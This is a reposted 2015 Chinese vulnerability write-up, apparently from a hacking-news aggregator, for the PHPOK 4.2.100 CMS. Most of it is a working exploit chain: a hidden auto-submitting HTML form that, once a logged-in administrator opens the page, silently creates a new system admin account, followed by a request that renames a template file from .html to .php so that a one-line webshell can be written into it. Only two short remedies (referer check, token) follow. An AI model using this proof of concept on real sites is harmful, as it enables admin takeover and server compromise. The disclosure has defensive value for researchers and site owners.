记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

phpok csrf添加管理员+后台getshell

2015-02-13 12:45

版本:4.2.100
CSRF风险在于那些通过基于受信任的输入form和对特定行为无需授权的已认证的用户来执行某些行为的web应用。已经通过被保存在用户浏览器中的cookie进行认证的用户将在完全无知的情况下发送HTTP请求到那个信任他的站点,进而进行用户不愿做的行为。


poc:


<div style="display:none">
<form action="http://localhost/phpok/admin.php?c=admin&f=save" id="poc" name="poc" method="post">
<input type="hidden" name="id" value=""/>
<input type="hidden" name="account" value=""/>
<input type="hidden" name="pass" value=""/>
<input type="hidden" name="email" value=""/>
<input type="hidden" name="status" value=""/>
<input type="hidden" name="if_system" value=""/>
<input type="submit" name="up" value="submit"/>
</form>
<script>
var t = document.poc;
t.account.value="wooyun";
t.pass.value="123456";
t.status.value="1";
t.if_system.value="1";
document.poc.submit();
</script>
</div>




 

QQ截图20150114173941.png





访问poc后
 

QQ截图20150114174011.png





Getshell:

风格管理-创建模板文件

默认这里只能添加html文件。但是可以绕过

 

QQ截图20150114174536.png




GET /phpok/admin.php?c=tpl&f=create&id=1&folder=/&type=file&title=wooyun.html



修改成 


GET /phpok/admin.php?c=tpl&f=create&id=1&folder=/&type=file&title=wooyun.php




 

QQ截图20150114174709.png



然后在编辑文件写入一句话木马就OK了。



文件目录 /tpl/www/

 

 

QQ截图20150114174709.png




 

QQ截图20150114175105.png

 

解决方案:

判断referer来源

添加token判断

 
知识来源: www.2cto.com/Article/201502/377140.html

阅读:102821 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“phpok csrf添加管理员+后台getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云